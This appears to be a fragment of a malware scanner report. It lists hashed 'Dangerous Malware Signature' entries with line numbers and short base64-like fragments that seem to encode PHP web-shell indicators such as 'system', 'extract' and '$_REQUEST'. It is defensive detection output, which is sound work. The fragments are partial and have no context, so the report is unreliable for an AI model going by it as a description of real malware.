| Sign d97f004d Line: 876 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign d97f004d Line: 878 Dangerous Malware Signature (hash: d97f004d) |
ZXh0cmFjd
| Sign de12c454 Line: 874 Dangerous Malware Signature (hash: de12c454) |
vcGVu
| Sign de12c454 Line: 876 Dangerous Malware Signature (hash: de12c454) |
V4dHJhY3
| Sign e6546205 Line: 874 Dangerous Malware Signature (hash: e6546205) |
kX1JFUVVFU1
| Sign e6546205 Line: 876 Dangerous Malware Signature (hash: e6546205) |
kZWZpbm
| Sign ee1cb326 Line: 874 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
| Sign ff4f5344 Line: 876 Dangerous Malware Signature (hash: ff4f5344) |
FycmF5X
|
|